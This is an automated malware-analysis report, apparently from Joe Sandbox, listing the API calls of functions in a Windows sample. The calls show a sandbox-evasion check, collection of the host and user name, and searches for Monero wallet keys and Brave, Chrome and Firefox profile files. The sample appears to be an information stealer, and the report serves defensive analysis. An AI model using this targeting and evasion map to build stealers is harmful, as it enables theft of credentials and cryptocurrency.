                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: 910729ec885d01e5db45a89b31fa29d53da6f053641ea5eca30f0673f6b963aa
                          • Instruction ID: af00ef862b9f4821313cfb74156a62dc8a62f7e4c2d6f27e3e4e0d1f47adc1bf
                          • Opcode Fuzzy Hash: 910729ec885d01e5db45a89b31fa29d53da6f053641ea5eca30f0673f6b963aa
                          • Instruction Fuzzy Hash: 9D0162B1944208EBDB10DF94DD45FAAFBB8F704B21F10421AEA45E3280C37859048BB5
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0054112B
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 00541132
                          • ExitProcess.KERNEL32 ref: 00541143
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$AllocCurrentExitNumaVirtual
                          • String ID:
                          • API String ID: 1103761159-0
                          • Opcode ID: 7af9bf6c0ac28963557f33437c13db63d18867a43fc4116bb1e7e72c516f065e
                          • Instruction ID: f3aa8f6f6cf297fe64ee3c59b72add0a5333aaa336e3f832f5311aad4c58ff13
                          • Opcode Fuzzy Hash: 7af9bf6c0ac28963557f33437c13db63d18867a43fc4116bb1e7e72c516f065e
                          • Instruction Fuzzy Hash: 30E0E670985308FBF710ABA19C0EB497A78AB04B45F204055F709761D0D6B92640979E
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 005410B3
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 005410F7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: e6cce850ca3eed1319afbcef3d5f966760a28840acec9b5918748529258167db
                          • Instruction ID: ad979e7d54e63171e9091120d29bd7897c341c9a54eab0ca3def99d3140d439e
                          • Opcode Fuzzy Hash: e6cce850ca3eed1319afbcef3d5f966760a28840acec9b5918748529258167db
                          • Instruction Fuzzy Hash: 5AF0E271681208BBE7149AA4AC5DFBABBE8E705B15F304449F904E3280D5719F40DBA8
                          APIs
                            • Part of subcall function 005578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557910
                            • Part of subcall function 005578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00557917
                            • Part of subcall function 005578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0055792F
                            • Part of subcall function 00557850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005411B7), ref: 00557880
                            • Part of subcall function 00557850: RtlAllocateHeap.NTDLL(00000000), ref: 00557887
                            • Part of subcall function 00557850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0055789F
                          • ExitProcess.KERNEL32 ref: 005411C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AllocateName$ComputerExitUser
                          • String ID:
                          • API String ID: 3550813701-0
                          • Opcode ID: 4f1449074fbab0fb4df5f5a12fe37fe0ac94036dbb1418a4e87fc056800d1ac0
                          • Instruction ID: b55363fb87426da481e92bb1159e7fbf36ff10ec0fb6d647fcb5b2724e286043
                          • Opcode Fuzzy Hash: 4f1449074fbab0fb4df5f5a12fe37fe0ac94036dbb1418a4e87fc056800d1ac0
                          • Instruction Fuzzy Hash: 9CE0ECB595420663DA0073B0BC1EB2A3A9C7B5434AF144426BE0592502FE29E854866E
                          APIs
                          • wsprintfA.USER32 ref: 005538CC
                          • FindFirstFileA.KERNEL32(?,?), ref: 005538E3
                          • lstrcat.KERNEL32(?,?), ref: 00553935
                          • StrCmpCA.SHLWAPI(?,00560F70), ref: 00553947
                          • StrCmpCA.SHLWAPI(?,00560F74), ref: 0055395D
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00553C67
                          • FindClose.KERNEL32(000000FF), ref: 00553C7C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                          • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 1125553467-2524465048
                          • Opcode ID: 788b62a7736fc9f0f9d05a592ea60876c2f86300ff96b8e1f84385fe2657cccc
                          • Instruction ID: ee6726cd8cc635dd126b556541277f79f90b32a300dd20c78184e5c2eacc45f4
                          • Opcode Fuzzy Hash: 788b62a7736fc9f0f9d05a592ea60876c2f86300ff96b8e1f84385fe2657cccc
                          • Instruction Fuzzy Hash: CDA154B1A40209ABDB24DF64DC99FFE7778BF84301F048589B90D96141EB759B88CF62
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                          • FindFirstFileA.KERNEL32(00000000,?,00560B32,00560B2B,00000000,?,?,?,005613F4,00560B2A), ref: 0054BEF5
                          • StrCmpCA.SHLWAPI(?,005613F8), ref: 0054BF4D
                          • StrCmpCA.SHLWAPI(?,005613FC), ref: 0054BF63
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0054C7BF
                          • FindClose.KERNEL32(000000FF), ref: 0054C7D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 3334442632-726946144
                          • Opcode ID: 65a91ef4e41134e64d14be6a2c096153fe332c1e712076cb176fdc1662b760c5
                          • Instruction ID: a376b533160e8361919a632a0eec6438eb9fd25761e526e0633f112b21ee6eaa
                          • Opcode Fuzzy Hash: 65a91ef4e41134e64d14be6a2c096153fe332c1e712076cb176fdc1662b760c5
                          • Instruction Fuzzy Hash: 74425572910105ABDB14FB70DD6AEED7B3CBBC4301F408659B90697191EE34AB4DCB92
                          APIs
                          • wsprintfA.USER32 ref: 0055492C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00554943
                          • StrCmpCA.SHLWAPI(?,00560FDC), ref: 00554971
                          • StrCmpCA.SHLWAPI(?,00560FE0), ref: 00554987
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00554B7D
                          • FindClose.KERNEL32(000000FF), ref: 00554B92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s$%s\%s$%s\*
                          • API String ID: 180737720-445461498
                          • Opcode ID: 04333ad11347fc0ef541f071beec22bdc498b558ccadcaff337a05f21e8f1590
                          • Instruction ID: 25c70a7144cb8ea6f54f23c9828e767d37f53b59e1e27ec353f2f192a2948708
                          • Opcode Fuzzy Hash: 04333ad11347fc0ef541f071beec22bdc498b558ccadcaff337a05f21e8f1590
                          • Instruction Fuzzy Hash: 4A6188B1900219BBDB20EFA0DC59FEA777CBB48701F048589F50996140EB74EB89CFA5
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00554580
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00554587
                          • wsprintfA.USER32 ref: 005545A6
                          • FindFirstFileA.KERNEL32(?,?), ref: 005545BD
                          • StrCmpCA.SHLWAPI(?,00560FC4), ref: 005545EB
                          • StrCmpCA.SHLWAPI(?,00560FC8), ref: 00554601
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0055468B
                          • FindClose.KERNEL32(000000FF), ref: 005546A0
                          • lstrcat.KERNEL32(?,0123FC20), ref: 005546C5
                          • lstrcat.KERNEL32(?,0123E5C8), ref: 005546D8
                          • lstrlen.KERNEL32(?), ref: 005546E5
                          • lstrlen.KERNEL32(?), ref: 005546F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                           • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                          • String ID: %s\%s$%s\*
                          • API String ID: 671575355-2848263008
                          • Opcode ID: e9e4c2080c383325aa0f174e275d71741ed6d9e5128f18c9a4716fb2cb39c1e4
                          • Instruction ID: d84d3b38120dc258fe4cb8ce6034e4e2a78415416661d8be6979e32facc4e920
                          • Opcode Fuzzy Hash: e9e4c2080c383325aa0f174e275d71741ed6d9e5128f18c9a4716fb2cb39c1e4
                          • Instruction Fuzzy Hash: 1C518AB1550218ABD720EB70DC99FEE777CBB58301F408589F60992190EB789BC8CFA5
                          APIs
                          • wsprintfA.USER32 ref: 00553EC3
                          • FindFirstFileA.KERNEL32(?,?), ref: 00553EDA
                          • StrCmpCA.SHLWAPI(?,00560FAC), ref: 00553F08
                          • StrCmpCA.SHLWAPI(?,00560FB0), ref: 00553F1E
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0055406C
                          • FindClose.KERNEL32(000000FF), ref: 00554081
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                           • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 180737720-4073750446
                          • Opcode ID: 5be10a7a47545d9d5a4ddb7ed8d6ecca863d1e697075e10f3d1d992c0c69e382
                          • Instruction ID: 3a2c943eeae5c1b31f3e56dc2bf6dc11c673c420c55e6ef6cc633be02eb5b601
                          • Opcode Fuzzy Hash: 5be10a7a47545d9d5a4ddb7ed8d6ecca863d1e697075e10f3d1d992c0c69e382
                          • Instruction Fuzzy Hash: 73518EB1500219BBDB24FBB0DC59EFA777CBB44301F008589B65996040DB79EB89CF65
                          APIs
                          • wsprintfA.USER32 ref: 0054ED3E
                          • FindFirstFileA.KERNEL32(?,?), ref: 0054ED55
                          • StrCmpCA.SHLWAPI(?,00561538), ref: 0054EDAB
                          • StrCmpCA.SHLWAPI(?,0056153C), ref: 0054EDC1
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0054F2AE
                          • FindClose.KERNEL32(000000FF), ref: 0054F2C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                           • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 180737720-1013718255
                          • Opcode ID: a333c05285d4963d55e2d798cbccf320a711b56104f115c23e3c14cec2014cfe
                          • Instruction ID: 486ff4cc767123a5fac0bb584b301631ae7ed16b74af6591e34bbe1b86cb7b05
                          • Opcode Fuzzy Hash: a333c05285d4963d55e2d798cbccf320a711b56104f115c23e3c14cec2014cfe
                          • Instruction Fuzzy Hash: 8DE106729111195AEB54FB60CC66EEE7B38BF94301F40429AB90B62452EF306F8ECF51
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005615B8,00560D96), ref: 0054F71E
                          • StrCmpCA.SHLWAPI(?,005615BC), ref: 0054F76F
                          • StrCmpCA.SHLWAPI(?,005615C0), ref: 0054F785
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0054FAB1
                          • FindClose.KERNEL32(000000FF), ref: 0054FAC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                           • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: prefs.js
                          • API String ID: 3334442632-3783873740
                          • Opcode ID: 2450c32237b4c24d5d2281e2d4b05470d8092b8e62874258cba5339ef6e90989
                          • Instruction ID: 5abe8a42dcb01abe18968737260197d16a9184e07284bc86d766a53c2c46c932
                          • Opcode Fuzzy Hash: 2450c32237b4c24d5d2281e2d4b05470d8092b8e62874258cba5339ef6e90989
                          • Instruction Fuzzy Hash: 9AB174719101199BDB24FF64DC69EEE7B78BF94301F4086A9A80A97141EF306B4DCF92
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0056510C,?,?,?,005651B4,?,?,00000000,?,00000000), ref: 00541923
                          • StrCmpCA.SHLWAPI(?,0056525C), ref: 00541973
                          • StrCmpCA.SHLWAPI(?,00565304), ref: 00541989
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00541D40
                          • DeleteFileA.KERNEL32(00000000), ref: 00541DCA
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00541E20
                          • FindClose.KERNEL32(000000FF), ref: 00541E32
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
